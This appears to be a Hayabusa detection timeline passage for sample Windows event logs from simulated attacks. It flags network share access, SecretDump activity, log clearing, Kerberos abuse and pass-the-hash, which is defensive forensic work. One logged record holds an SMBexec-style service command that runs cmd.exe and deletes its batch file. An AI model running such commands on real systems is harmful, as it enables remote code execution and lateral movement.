0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.084 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx 2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx 2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx 2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx 2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x2cff42b44,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx 2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the 